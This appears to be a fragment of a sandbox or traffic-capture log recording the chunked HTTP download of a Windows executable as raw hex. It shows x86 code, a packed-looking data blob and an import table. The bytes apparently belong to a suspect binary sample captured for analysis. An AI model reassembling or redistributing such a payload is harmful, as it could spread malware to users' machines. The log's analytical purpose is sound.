2000VaY^]UEttj]UQjMhhB%hBYM!hBU=Buh0L@BYEhB]j;BX#jM}ewGN8tOtjwwMYMn#U}Vt+
2023-06-21 02:28:21 UTC	962	IN	Data Raw: 89 45 fc 64 8b 1d Data Ascii: Ed
2023-06-21 02:28:21 UTC	962	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	962	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 8b 03 64 a3 00 00 00 00 8b 45 08 8b 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 5f 6c 40 00 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 af 88 00 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 c0 fb ff ff 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 0f 03 00 00 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 83 fb ff ff 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec 38 Data Ascii: 2000dE]mc[XY$XY$XY$UQQSVWd5uE_l@juuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3jVvvjuvu ^]U8
2023-06-21 02:28:21 UTC	970	IN	Data Raw: e8 0a fb ff ff 59 Data Ascii: Y
2023-06-21 02:28:21 UTC	970	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	970	IN	Data Raw: 32 30 30 30 0d 0a ff d0 85 c0 74 1b 6a 00 56 e8 e7 fb ff ff 59 59 ff 15 3c 11 40 00 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 92 fb ff ff 33 c0 5f 5e c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 6a f8 ff ff 8b f8 59 85 ff 75 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 ea f8 ff ff 8b f8 83 c4 0c 85 ff 75 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 c3 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 ff 75 0c ff 75 08 e8 4d 4a 00 00 8b f8 59 59 85 ff 75 2c 39 45 0c 74 27 39 05 10 a1 42 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 a1 42 00 76 Data Ascii: 2000tjVYY<@N3@3_^UVW3ujYu'9BvV@;Bvu_^]UVW3juuu'9BvV@;Bvu_^]UVW3uuMJYYu,9Et'9BvV@;Bv
2023-06-21 02:28:21 UTC	978	IN	Data Raw: ba 03 00 00 00 83 Data Ascii:
2023-06-21 02:28:21 UTC	978	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	978	IN	Data Raw: 32 30 30 30 0d 0a f9 04 72 0c 83 e0 03 2b c8 ff 24 85 14 ac 40 00 ff 24 8d 10 ad 40 00 90 24 ac 40 00 48 ac 40 00 70 ac 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 10 ad 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 10 ad 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 10 ad 40 00 8d 49 00 c4 ac 40 00 cc ac 40 00 d4 ac 40 00 dc ac 40 00 e4 ac 40 00 ec ac 40 00 f4 ac 40 00 07 ad 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 Data Ascii: 2000r+$@$@$@H@p@F#Gr$@IF#GFGr$@F#GFGFGV$@I@@@@@@@@DDDDDDDDDDDDD
2023-06-21 02:28:21 UTC	986	IN	Data Raw: ff 56 56 56 56 56 Data Ascii: VVVVV
2023-06-21 02:28:21 UTC	986	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	986	IN	Data Raw: 32 30 30 30 0d 0a c7 00 16 00 00 00 e8 33 b7 ff ff 83 c4 14 83 c8 ff e9 be 06 00 00 53 57 8b 7d 08 8b c7 c1 f8 05 8d 34 85 20 32 4b 00 8b 06 83 e7 1f c1 e7 06 03 c7 8a 58 24 02 db d0 fb 89 b5 28 e5 ff ff 88 9d 27 e5 ff ff 80 fb 02 74 05 80 fb 01 75 30 8b 4d 10 f7 d1 f6 c1 01 75 26 e8 5c b7 ff ff 33 f6 89 30 e8 40 b7 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 c8 b6 ff ff 83 c4 14 e9 43 06 00 00 f6 40 04 20 74 11 6a 02 6a 00 6a 00 ff 75 08 e8 7e fd ff ff 83 c4 10 ff 75 08 e8 69 07 00 00 59 85 c0 0f 84 9d 02 00 00 8b 06 f6 44 07 04 80 0f 84 90 02 00 00 e8 9d bc ff ff 8b 40 6c 33 c9 39 48 14 8d 85 1c e5 ff ff 0f 94 c1 50 8b 06 ff 34 07 89 8d 20 e5 ff ff ff 15 a0 11 40 00 85 c0 0f 84 60 02 00 00 33 c9 39 8d 20 e5 ff ff 74 08 84 db 0f 84 50 02 00 00 ff 15 9c 11 Data Ascii: 20003SW}4 2KX$('tu0Mu&\30@VVVVVC@ tjjju~uiYD@l39HP4 @`39 tP
2023-06-21 02:28:21 UTC	994	IN	Data Raw: 01 ff 75 e4 e8 55 Data Ascii: uU
2023-06-21 02:28:21 UTC	994	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	994	IN	Data Raw: 31 66 66 38 0d 0a d3 ff ff 59 8b 45 e0 8d 65 c0 5f 5e 5b 8b 4d fc 33 cd e8 ca 83 ff ff c9 c3 8b ff 55 8b ec 8b 4d 08 53 33 db 3b cb 56 57 7c 5b 3b 0d 04 32 4b 00 73 53 8b c1 c1 f8 05 8b f1 8d 3c 85 20 32 4b 00 8b 07 83 e6 1f c1 e6 06 03 c6 f6 40 04 01 74 35 83 38 ff 74 30 83 3d 44 61 42 00 01 75 1d 2b cb 74 10 49 74 08 49 75 13 53 6a f4 eb 08 53 6a f5 eb 03 53 6a f6 ff 15 b0 11 40 00 8b 07 83 0c 06 ff 33 c0 eb 15 e8 1c 97 ff ff c7 00 09 00 00 00 e8 24 97 ff ff 89 18 83 c8 ff 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 45 08 83 f8 fe 75 18 e8 08 97 ff ff 83 20 00 e8 ed 96 ff ff c7 00 09 00 00 00 83 c8 ff 5d c3 56 33 f6 3b c6 7c 22 3b 05 04 32 4b 00 73 1a 8b c8 83 e0 1f c1 f9 05 8b 0c 8d 20 32 4b 00 c1 e0 06 03 c1 f6 40 04 01 75 24 e8 c7 96 ff ff 89 30 e8 ad 96 ff ff Data Ascii: 1ff8YEe_^[M3UMS3;VW\|[;2KsS< 2K@t58t0=DaBu+tItIuSjSjSj@3$_^[]UEu ]V3;\|";2Ks 2K@u$0
2023-06-21 02:28:21 UTC	1002	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:21 UTC	1002	IN	Data Raw: 92 01 91 be a0 b8 36 0d b4 59 9a ce a6 05 02 8b ad ae 34 48 66 31 4a a0 ae e0 3d bf 90 59 42 a4 9a 11 c0 f5 c9 a5 73 19 64 de 67 dc 78 59 5d 18 3a d5 1b 34 a1 e4 06 7e c0 9d b8 11 cd f6 1f f3 20 10 cb f0 4a 8d 72 47 fd 79 37 2b c5 5e 1f 03 d1 08 86 44 e0 5e e6 da 4c 11 95 fd 3a fa fa ea be 46 65 b9 df 39 c1 33 a6 83 09 27 03 29 fd 8e 59 3f 5c 43 b1 8e 79 ab a9 a8 3e a7 ad 0c 9b 47 87 33 01 25 19 94 78 2d e7 b8 7e 50 17 45 9e bb 33 80 24 da c6 cf 48 04 0e e3 ba 2e 22 01 d5 63 39 b6 c1 1f 63 01 26 4f d5 be e4 3f fb 6f c3 28 5b 8b 48 83 ae 92 94 a5 6d b0 e5 22 4a 5a c2 c5 07 b8 ad 14 e0 f9 cb 4f f1 bb 0f 3f 14 7d 7f ac d8 51 b5 7f e6 df 95 0f e1 6f 84 eb 4a 5d 09 5b 3f 7d 2c 33 e2 e8 b9 5a d2 22 77 d8 35 7b 94 ab c0 ab af 93 be 96 72 ac f3 d5 f9 34 00 8a 05 Data Ascii: 6Y4Hf1J=YBsdgxY]:4~ JrGy7+^D^L:Fe93')Y?\Cy>G3%x-~PE3$H."c9c&O?o([Hm"JZO?}QoJ][?},3Z"w5{r4
2023-06-21 02:28:21 UTC	1010	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1010	IN	Data Raw: 32 30 30 30 0d 0a 55 4a e8 39 3f 2c 5b 6f cf b1 3a fd 1b ce 91 34 ef 9e 4c 7b a7 18 05 73 54 9c e6 d2 8e 69 6b 16 38 79 c4 51 d7 c8 44 0a 93 d0 57 06 de 49 d4 34 c9 e0 58 53 e9 41 b1 7d cc 50 be 1b 26 72 45 d5 fe f9 ac 63 3b 0d b8 eb 33 84 b8 5e 79 f4 9f 11 86 ee a9 da 9f 6d 14 5b c7 8e 19 f6 bf 29 76 25 1d db 0b 67 57 f2 c0 a7 5f 25 f8 e3 92 66 d8 0c a8 db 88 37 94 27 cc 15 74 60 b7 1c 76 7a 46 d5 18 e4 74 89 b5 34 81 82 6c 6e 1f 90 1b 31 7e bf fd 6d fb 0e 7d 1d 0f 1b 04 8a b1 30 fd ad 0c 98 a4 99 6c 15 39 1d a7 0d 97 7b ed 3b cf 2d e9 60 cf 02 c5 b1 cd 4b 95 db ab b0 64 3b b0 bb 37 17 bd 2b 8b 6c 5b 67 6f 1c 93 6d bb 1a 75 14 5b 80 97 3a d1 e9 ca 17 8c 22 0f a6 b1 b9 a9 b8 19 d3 e1 fd d1 6b 81 cd 1c 5a 63 96 98 74 69 57 08 4d d9 47 cc 8d 23 cb ce 8f 15 Data Ascii: 2000UJ9?,[o:4L{sTik8yQDWI4XSA}P&rEc;3^ym[)v%gW_%f7't`vzFt4ln1~m}0l9{;-`Kd;7+l[gomu[:"kZctiWMG#
2023-06-21 02:28:21 UTC	1018	IN	Data Raw: 9f 48 20 69 46 24 Data Ascii: H iF$
2023-06-21 02:28:21 UTC	1018	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1018	IN	Data Raw: 32 30 30 30 0d 0a 72 99 9f 79 23 a1 1b 04 78 6e cf f9 bc 46 4b 1f 1b 2b 27 10 93 01 e4 8a 54 c7 10 f9 d3 33 15 68 f5 f0 05 57 5f cc cd 16 c6 c2 a1 d1 5a 1b d4 74 eb c7 a1 5a b5 ab 19 1a bd 4f f9 99 0b d5 4e 30 3f 6d b4 3d 2e 07 72 32 60 16 b1 8a 6a 9d e0 d3 20 5a f2 82 5a 1b e4 f7 9e 0b cd 51 79 6a 37 ff 1c c6 11 84 77 32 15 74 d7 69 3f 2f 2c 8a 15 3a 0e b4 06 3f 0f 55 5d c6 1d fa ce 8e f0 66 55 4e b7 d3 54 f3 a6 9c dd c9 0e a1 cc 55 e0 d2 ef 59 93 00 61 64 e4 4b 13 27 3a dd dd 41 36 05 68 f0 66 83 f6 07 e3 c8 ec a9 9a 38 f5 84 73 44 7d 6d e7 82 a4 21 21 07 b6 8a 8a 3e 91 9e c6 be cc 21 e2 bc d1 79 c2 5d 0e 96 d7 8d 55 9f 5f 8d cb 9e 7f bf 7d 22 7a 70 6a e4 3f ea 7a a8 4e 47 c5 ac 46 1b 9d d6 1e 9e 4c e6 ad f5 07 7d 0b eb 27 81 d0 ff e7 db d3 d5 9b e0 e7 Data Ascii: 2000ry#xnFK+'T3hW_ZtZON0?m=.r2`j ZZQyj7w2ti?/,:?U]fUNTUYadK':A6hf8sD}m!!>!y]U_}"zpj?zNGFL}'
2023-06-21 02:28:21 UTC	1026	IN	Data Raw: 2a 82 72 55 05 c8 Data Ascii: *rU
2023-06-21 02:28:21 UTC	1026	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1026	IN	Data Raw: 32 30 30 30 0d 0a 4c c9 87 ae e3 79 bd e0 f1 da eb 6b 05 df ab eb be 47 d1 a8 4c d3 4f 54 a3 d5 29 17 9a 64 81 b7 08 9d 80 33 30 84 e3 d9 bd 97 68 de 23 4a 1d b8 2c 44 a9 de 36 e0 d1 6f f9 63 82 24 a7 94 68 93 f2 43 f2 76 bf 8e de c1 30 38 10 6a 56 7a 04 af 33 2e d9 a9 ab fc f5 98 0a 69 d0 f8 f3 8e c1 08 61 5c f9 5a c9 99 29 7e 42 76 5a 81 7d d4 52 53 a6 f7 8b 01 73 84 53 0f e7 79 ad 58 61 f9 d9 40 96 33 99 2a de a4 2a f1 ca dc 7c 3f 9f f5 99 42 70 d7 ce 25 e1 0d bf e5 c6 ff 0c 77 be 32 94 64 3a d8 4f 3f 3e 3a d7 ba ba 85 79 6f 01 eb 68 6d 50 73 11 c8 15 d1 f9 06 d2 68 ca f7 de 04 c4 a4 0f db 9d 1d b8 67 3b c6 13 90 5a 86 ef 29 39 47 34 ac a1 21 13 bc f8 6d ac d7 9c ef 74 e9 db c0 75 8e 60 de a4 85 a2 6d 89 9e 6d e4 e9 50 72 ba 75 6e 1a 81 b9 37 52 5e 10 Data Ascii: 2000LykGLOT)d30h#J,D6oc$hCv08jVz3.ia\Z)~BvZ}RSsSyXa@3**\|?Bp%w2d:O?>:yohmPshg;Z)9G4!mtu`mmPrun7R^
2023-06-21 02:28:21 UTC	1034	IN	Data Raw: 8f 75 93 cb e4 92 Data Ascii: u
2023-06-21 02:28:21 UTC	1034	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1034	IN	Data Raw: 32 30 30 30 0d 0a e9 2f dc 7c 33 1a c3 9a 68 a8 94 ec 30 46 4b dd 80 2f e0 c2 a6 54 ba 7c a2 f4 3a 25 70 22 43 de 81 6a fd 27 68 63 86 e4 51 02 a0 53 c6 88 89 9d 38 5e 94 25 8f 11 56 28 02 9e 2b e0 7c 38 cd 15 29 a6 e3 23 39 51 b8 91 b2 1a 9e 51 2e 4f 14 87 a5 bf 22 21 47 aa e8 8e 49 e0 27 ae dc a3 a9 4c 24 56 7c e9 a0 31 bf b1 6c 82 a1 2e 1b 32 c6 03 28 fa 1f 4a bd da 41 b4 8f cc c6 ee db 35 c8 3e 26 6c b5 c2 12 fb 14 ff c9 29 8e 50 ef 34 70 47 4f 0e 3f c3 be 62 d3 19 7b c0 b4 d0 8b f1 41 8f ba 9a ba 51 1f 49 b4 a5 5b 12 cf e1 25 f2 4b 81 17 b4 ac d9 78 02 7d 1b f9 76 8c 00 a0 35 ca d5 f1 eb 58 c9 79 da 41 2d 7a 18 b9 a3 03 9c 3b 55 c6 c5 ce 7e 13 99 e8 4d 29 33 e7 19 36 60 02 e6 3c 60 48 d1 46 cf 0d 3c fb 8f 5e b4 a7 17 2f df 27 43 43 23 33 e2 83 b7 25 Data Ascii: 2000/\|3h0FK/T\|:%p"Cj'hcQS8^%V(+\|8)#9QQ.O"!GI'L$V\|1l.2(JA5>&l)P4pGO?b{AQI[%Kx}v5XyA-z;U~M)36`<`HF<^/'CC#3%
2023-06-21 02:28:21 UTC	1042	IN	Data Raw: 86 72 9c e9 c7 b0 Data Ascii: r
2023-06-21 02:28:21 UTC	1042	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1042	IN	Data Raw: 32 30 30 30 0d 0a 97 8c 85 26 28 32 54 84 ab 03 3e c2 08 f0 1e 2f 20 20 93 00 2e fb 44 88 ca d9 e0 02 0d da 6c e4 b5 8b 8e f3 a0 99 62 c5 5d a9 76 19 76 82 d5 04 ac 24 e3 19 e6 95 ae b9 4b 62 2f 2a fd f5 74 5e 58 46 50 42 48 00 49 84 4c 78 4a 07 5c 2e 5b 02 a1 64 d1 b9 ac 19 1c 31 59 d5 f0 eb 52 50 bf 03 35 35 b5 eb da 14 51 ce 09 57 8b d1 cb 2c 88 8a be 25 bf 82 d9 f6 49 b5 fc 89 cd 61 2b e9 f4 c9 2a 42 e9 6a d9 2e 2d 4f 3f b6 6f 08 c4 0d 6a 53 0f 26 01 0f 6b 12 b5 4f 4d fc e5 f4 36 70 0c 1f 58 0d 4e 45 96 00 83 ee 10 40 ed 4a b4 86 af 4a 5a ab 7c 28 cf 71 62 61 63 c9 e4 ca 1b 48 83 29 ce ee db f3 89 ba a0 05 dd 41 fb 38 7c fd fb 71 26 96 dc e4 25 e6 5c 2d b1 5d 29 50 fb 1c 1d 84 e9 a0 12 78 22 af 18 b9 ff 50 8b 8e 73 86 fe d6 d8 9c 28 05 92 1d 0c fe 93 Data Ascii: 2000&(2T>/ .Dlb]vv$Kb/t^XFPBHILxJ\.[d1YRP55QW,%Ia+Bj.-O?ojS&kOM6pXNE@JJZ\|(qbacH)A8\|q&%\-])Px"Ps(
2023-06-21 02:28:21 UTC	1050	IN	Data Raw: 51 52 a0 bf e8 91 Data Ascii: QR
2023-06-21 02:28:21 UTC	1050	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1050	IN	Data Raw: 32 30 30 30 0d 0a 55 d7 62 74 2b 52 b3 a5 45 35 4e 02 0e 98 97 62 0f aa 66 48 92 ca 3c 76 15 74 7f f3 9e b1 c3 2e 19 dd 13 9c 36 7c d6 fb d8 6d 64 34 48 28 4c 90 f2 ad e2 25 e3 3a 44 c0 96 38 cf c3 3e 22 83 54 b5 1d 16 10 8d 34 81 d2 44 75 de 8c e4 21 c7 3e 71 d3 e9 8b ba f8 82 46 4c 90 58 55 78 71 12 80 64 79 cd c6 92 c2 4d 76 3b 4f 0e fc 1e 8e 45 17 cf 77 5b 1c a2 ca aa 13 55 6f f2 5f 55 c0 52 62 49 fe 75 75 d8 b6 17 1e 0d 99 d4 15 44 ab f8 ae b0 c9 2f 3d d4 76 73 94 bd b7 16 0a 25 a2 b3 b6 15 b0 60 94 63 54 38 09 13 e2 21 a5 92 1f 13 a4 99 b1 2e d5 fa 57 aa 39 4b 57 78 8b ab 1d bf 11 35 97 dc 25 cf 36 e0 76 eb 38 4d d8 4b 02 e1 40 00 bd 11 c1 d1 18 2b c3 a3 22 db dc 26 5d 71 6d 1c 61 55 2a 0d f6 62 b4 e9 d6 3e 7d a0 8a ef e4 bc 88 cc ef 15 18 f6 f2 08 Data Ascii: 2000Ubt+RE5NbfH<vt.6\|md4H(L%:D8>"T4Du!>qFLXUxqdyMv;OEw[Uo_URbIuuD/=vs%`cT8!.W9KWx5%6v8MK@+"&]qmaU*b>}
2023-06-21 02:28:21 UTC	1058	IN	Data Raw: 00 56 9b 03 3b f7 Data Ascii: V;
2023-06-21 02:28:21 UTC	1058	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1058	IN	Data Raw: 31 66 66 38 0d 0a 85 87 a5 91 8f 30 54 00 1d 44 91 36 87 31 83 92 b4 6a fb 62 5f d2 b9 f3 a6 66 19 74 86 71 a5 c1 10 4d c7 54 ca b9 b1 ca 54 af 7c ca e6 91 9e 34 22 99 3e 19 91 83 03 bc c4 15 29 da d7 09 11 e8 c9 87 dc c0 8f 09 2b 2c c6 94 34 6d 70 35 87 c7 0b c2 ab ea f6 bd 24 1f 8e 81 c1 16 29 1d c3 a9 dc 1b 0d 13 9c e7 18 8d 1b 84 a7 b9 c7 df 97 fc d3 0e ef 3f 89 44 9b 8b 7f 8a ca 0b a3 4b 2f 97 d7 18 f9 b3 12 f0 a2 64 e4 42 b4 b8 d3 a1 d1 c8 7d c0 ae 57 9b 5e 89 d4 83 c0 30 a6 eb 67 73 5e 8e 47 1d 33 da 4f 94 01 5f 8f ca c0 54 84 f9 f9 0c 61 17 12 68 d9 44 07 b3 51 0d 81 9e f5 a4 cb df ee 03 e2 5f 8b 30 39 be 9a 91 a1 dd 0f 67 fc 7e 30 4d d4 88 d3 d5 d9 a3 34 f1 3e 8c f5 bd ca 8f 6c 6d 77 4f cf aa bf 1a 36 9f 6f 73 c6 fd 2f 51 e9 8d 55 23 02 5a 9a be Data Ascii: 1ff80TD61jb_ftqMTT\|4">)+,4mp5$)?DK/dB}W^0gs^G3O_TahDQ_09g~0M4>lmwO6os/QU#Z
2023-06-21 02:28:21 UTC	1066	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:21 UTC	1066	IN	Data Raw: 6b 6e 3d da 83 89 a9 57 0c b4 16 f2 ba ec 98 4d e4 95 8e 53 6d 03 61 f0 b5 6c 7c 0a 41 b1 65 2a 2a a4 91 e3 3d 64 68 d5 db 09 fe 2d cf e6 2f 43 58 2d 2e a8 39 62 b0 02 a7 67 0a 62 96 49 97 4a 7c 5a 71 61 a6 c6 16 5e b8 37 e2 a9 d4 df 99 a3 9e d1 57 fc 0a 24 c2 9e e7 9e a2 55 e8 4c 10 55 d7 d4 59 2f 9a 6d 68 14 c5 64 49 71 b7 42 2b c1 4c b6 c7 b3 8f ec d9 26 a7 8f 69 5d b7 67 74 d1 a4 72 a2 94 b6 0b 2b cd 1f 66 73 66 d5 28 5f cf b8 45 9b b9 2d 7e 36 1f ad 5b 4a 9e 36 48 a4 12 bb 58 4b 46 57 2e ea a8 10 e1 a1 fd 78 48 c0 eb 02 e4 21 0a b2 73 67 f5 e7 2f e7 48 86 a0 f2 db 39 d2 70 ac 3c db a3 95 59 2c c0 9c dc 7c 62 12 a5 ae c8 fa c7 99 a2 40 a4 ed 68 4b 53 bd 4d 2d cb 8f cf 55 2d 9f 6b 25 18 8a 93 42 4f 96 15 d6 3c 1e 13 0a 6d 21 15 3f 18 ee 9e 78 f6 3d 52 Data Ascii: kn=WMSmal\|Ae**=dh-/CX-.9bgbIJ\|Zqa^7W$ULUY/mhdIqB+L&i]gtr+fsf(_E-~6[J6HXKFW.xH!sg/H9p<Y,\|b@hKSM-U-k%BO<m!?x=R
2023-06-21 02:28:21 UTC	1074	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1074	IN	Data Raw: 32 30 30 30 0d 0a a8 81 05 57 0a dd a6 d7 17 42 35 34 30 42 19 23 3c 1c b4 e2 91 20 29 3d cf 41 ad 70 f7 85 51 0d 4e e9 ea 26 ab ca 27 a3 c4 e8 46 4d 04 8d 81 18 04 46 9f 12 b1 10 d8 c8 a9 0e 4d 09 fe 5f d7 28 40 ae 2d 25 c3 d1 03 b8 91 b1 c1 ae a3 ad 47 65 db 67 0c b7 4c 3c 6d b1 84 8e 5e 17 dd e2 8e fc 71 08 89 17 a4 9c 79 c3 c5 4d 4c 21 18 37 67 81 21 53 ad bd 09 78 8e 23 75 4c fb 42 d7 dd 07 0b a6 8a 8b 60 19 28 97 4f 1c 22 2c 27 ac f4 d5 8b 8f e2 93 67 f5 c9 32 a3 1e 63 99 79 07 d7 51 12 b9 33 a2 26 ce 4a 3e 9f 77 5f 2d 73 0a 06 67 0a de 5f 68 21 b4 f3 d0 80 f7 ed 5c 49 88 18 a3 01 e0 ab 09 12 d9 d4 f3 29 dd 62 10 11 37 04 17 79 9c 67 69 95 3b 00 b6 03 b3 c7 28 84 ba 2e 4f ee 61 c5 46 e4 9e 49 ae 30 51 6a 94 b6 d8 ab ed 84 1c 6b ba ae 19 dd c4 04 21 Data Ascii: 2000WB540B#< )=ApQN&'FMFM_(@-%GegL<m^qyML!7g!Sx#uLB`(O",'g2cyQ3&J>w_-sg_h!\I)b7ygi;(.OaFI0Qjk!
2023-06-21 02:28:21 UTC	1082	IN	Data Raw: 70 64 61 74 65 52 Data Ascii: pdateR
2023-06-21 02:28:21 UTC	1082	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1082	IN	Data Raw: 32 30 30 30 0d 0a 65 73 6f 75 72 63 65 41 00 00 49 03 50 75 72 67 65 43 6f 6d 6d 00 a7 01 47 65 74 43 75 72 72 65 6e 74 44 69 72 65 63 74 6f 72 79 41 00 00 60 03 52 65 61 64 43 6f 6e 73 6f 6c 65 49 6e 70 75 74 57 00 2a 01 46 69 6e 64 46 69 72 73 74 56 6f 6c 75 6d 65 57 00 00 aa 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 4b 45 52 4e 45 4c 33 32 2e 64 6c 6c 00 00 69 02 53 65 74 43 61 72 65 74 50 6f 73 00 6d 01 47 65 74 53 79 73 43 6f 6c 6f 72 42 72 75 73 68 00 00 e1 01 4c 6f 61 64 4d 65 6e 75 57 00 38 00 43 68 61 72 55 70 70 65 72 42 75 66 66 41 00 00 34 00 43 68 61 72 54 6f 4f 65 6d 42 75 66 66 41 00 00 55 53 45 52 33 32 2e 64 6c 6c 00 00 ed 01 47 65 74 50 6f 6c 79 46 69 6c 6c 4d 6f 64 65 00 47 44 49 33 32 2e 64 6c 6c 00 29 02 52 65 61 Data Ascii: 2000esourceAIPurgeCommGetCurrentDirectoryA`ReadConsoleInputW*FindFirstVolumeWGetCurrentProcessIdKERNEL32.dlliSetCaretPosmGetSysColorBrushLoadMenuW8CharUpperBuffA4CharToOemBuffAUSER32.dllGetPolyFillModeGDI32.dll)Rea
2023-06-21 02:28:21 UTC	1090	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-06-21 02:28:21 UTC	1090	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1090	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-06-21 02:28:21 UTC	1098	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-06-21 02:28:21 UTC	1098	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:21 UTC	1098	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-06-21 02:28:21 UTC	1106	IN	Data Raw: 00 7f 00 00 00 7f Data Ascii:
2023-06-21 02:28:21 UTC	1106	IN	Data Raw: 0d 0a Data Ascii:
